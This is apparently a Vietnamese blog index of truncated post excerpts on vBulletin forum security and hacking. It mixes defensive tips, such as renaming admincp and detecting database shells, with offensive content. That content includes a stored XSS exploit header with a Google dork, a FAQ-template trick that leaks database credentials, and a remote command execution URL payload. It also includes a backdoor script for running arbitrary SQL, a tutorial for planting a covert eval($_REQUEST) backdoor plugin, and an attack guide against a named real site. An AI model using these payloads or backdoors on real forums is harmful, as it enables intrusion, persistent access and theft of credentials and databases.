Cách bảo vệ Admincp của diễn đàn Vbulletin

Những việc mà các bạn cần tìm hiểu và làm đó là: 1. Đổi tên (rename) cho cái thư mục admincp gốc của nó thành 1 cái tên khác mà các bạn chắc chắn chỉ có các admin có thể biết. Nhưng không sửa lại path trong file /includes/config.php. Ai không biết rename thì pm sent user + pass vps hay host qua inbox ccb Drop dùm cho ) vd: Aitimduocadmincpnaykhong 2....

Xem Thêm

Đọc thêm »

HTML Code: ########################################################################################## # # Exploit Title: Advanced User Tagging vBulletin - Stored XSS Vulnerability # Google Dork: intext:usertag_pro # Date: 10.07.2013 # Exploit Author: []0iZy5 # Vendor Homepage: www.backtrack-linux.ro # Software Link: http://www.dragonbyte-tech.com/vbecommerce.php?productid=20&do=product # Version:...

Xem Thêm

2 lỗi mà mình nói đến là lỗi SQL Injection của mod Chang stat và lỗi CSRF để add plugin. 1. Lỗi SQL Injection của Changuondyu Statistics Khi khai thác lỗi này, attacker sẽ lấy được gần như toàn bộ database của bạn nếu muốn. Và thông thường, cái attacker nhắm đến là table user. Khi lấy được 3 cột: userid, password và salt => Attacker...

Xem Thêm

Go to acp, Faq Manager and then edit a FAQ, add the following code: {$vbulletin->config['MasterServer']['servername']} {$vbulletin->config['MasterServer']['username']} {$vbulletin->config['MasterServer']['password']} {$vbulletin->config['Database']['dbname']} Save it. Go to http://[path]/faq.php and check it # 1337day.com [2012-12-0...

Xem Thêm

...

Xem Thêm

...

Xem Thêm

Có nhiều bạn hỏi tôi cách để phát hiện shell khi hacker include vào Database? Hôm nay tôi làm tut này để trả lời câu hỏi trên và giúp các bạn nhận thức thêm về vấn đề bảo mật.Trước hết ta phải biết cách thức mà hacker include vào Data thế nào thì sau đó mới có phương pháp để loại bỏ triệt để. Tôi xin nói thêm trong vbb những table có...

Xem Thêm

Mình viết bài này để giúp tăng cường bảo mật cho forum của các bạn, cho các bạn thấy được cách thức mà hacker đột nhập vào trang web các bạn để từ đó có cách phòng tránh. Mình không khuyến khích các bạn làm theo để thực hiện ý đồ xấu. Viết tut này cũng có mặt lợi và mặt hại của nó nhưng nếu các bạn biết áp dụng cho mục đích lương thiện...

Xem Thêm

Phần I Bài viết này Mafia viết thêm dựa trên tài liệu của shacker và một bài viết bằng tiếng Anh viết về bảo mật cho vbb. ok vào đề đi nà...

Xem Thêm

Bài này đc a Justom viết bên enhack hum nay mình leech về để mọi người tham khảo thêm 10 lưu ý bảo mật dữ liệu cho website PHP sử dụng Shared hosting Linux Ngày nay các ứng dụng web với mã nguồn mở phát triển rất mạnh, trong đó đặc biệt phổ biến là PHP – MySQL. Nhưng...

Xem Thêm

[*] Php Version http://pastebin.com/AX1bJbdH [*] Python http://pastebin.com/dKDH0SBc&nb...

Xem Thêm

TUT hướng dẫn bug tấn công vào icare.com.vn qua file Validator.php Tác Giả: Nobody Link down: http://www.mediafire.com/?ntrngjdzczj Đây cùng do sự bất cẩn của admin quên chưa xóa fle Validator.php file này có khả năng view hệ các file và thư mục của vBB....

Xem Thêm

Screenshot: Khả năng : Run query SQL tùy thích qua con backdoor (Select, Update, Drop ....) Cách sử dụng Quote: + Up thẳng vào thư mục forum vBB (ngang hàng với index.php). + Run: http://site.com/forum/backdoor.php?vnh= Câu lệnh sql hoặc + Admincp -> Product & Plugin Manager -> Add new plugin -> - Hook Location...

Xem Thêm

Trong trường hợp bạn bị mất quyền Admin, mất hết Permission (hoặc bị thay đổi permission). Công cụ này sẽ giúp bạn lấy lại group Admin và toàn quyền quản lí diễn đàn (Full Administrator Permission). Demo: Download: File name: Admin-Reset-Tools.php http://www.mediafire.com/?0279fvoisek8t27 (3 KB) Password Unlock: junookyo...

Xem Thêm

Mấy ngày nay DaiCa.Net đã bị kẻ lạ login vào account admin. Tuy nhiên kẻ lạ mặt chưa làm gì được Sau khi được juno_okyo Report là có bug tại mod Changuondyu Static. Mình đã kiểm tra lại các input, tất cả các input chỉ có 1 input được đưa vào truy vấn, đó là $_REQUEST['listforumid'] Và quả thật là có bug SQLi. Đây là 1 lỗi cực kỳ nghiêm trọng và sai xót của coder (Còn nghiêm trọng hơn Bug Search...

Xem Thêm

Source: http://www.securityfocus.com/bid/5820/info A remote command execution vulnerability has been reported for vBulletin. The vulnerability is due to vBulletin failing to properly sanitize user-supplied input from URI parameters. An attacker can exploit this vulnerability to execute malicious commands on the vulnerable system. http://www.example.com/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60<command>%20%60;die();echo%22 where...

Xem Thêm

Source: http://www.securityfocus.com/bid/5997/info vBulletin does not filter HTML tags from URI parameters, making it prone to cross-site scripting attacks. As a result, it is possible for a remote attacker to create a malicious link containing script code which will be executed in the browser of a legitimate user, in the context of the website running vBulletin. This ...

Xem Thêm

Source: http://www.securityfocus.com/bid/6337/info Problems with vBulletin could make it possible for an attacker to inject arbitrary HTML in vBulletin forum messages. vBulletin does not sufficiently filter potentially malicious HTML code from posted messages. As a result, when a user chooses to view a message posting that contains malicious HTML code, the code contained in the...

Xem Thêm

Hello, hnay DuyK sẽ hướng dẫn các bạn cách chèn 1 “cửa sau” vào VBB nhanh-gọn-nhẹ-hiệu quả: Khi bạn đã login vào được admincp của 1 forum vbb nào đó, bạn muốn để lại 1 “cửa sau” trên website này 1 cách kín đáo nhất ? Okê, chỉ cần 1 dòng đơn giản: eval($_REQUEST['dct']); Đầu tiên bạn cần truy cập vào: Plugin & product manager => Plugin...

Trang

Xem Thêm

Xem Thêm

Xem Thêm

Xem Thêm

Xem Thêm

Xem Thêm

Xem Thêm

Xem Thêm

Xem Thêm

Xem Thêm

Xem Thêm

Xem Thêm

Xem Thêm

Xem Thêm

Xem Thêm

Xem Thêm

Xem Thêm

Xem Thêm

Xem Thêm

Vài lời cho các bạn !

Chuyên Mục

Bạn Đã Xem Chưa

Bài đăng phổ biến

Liên Kết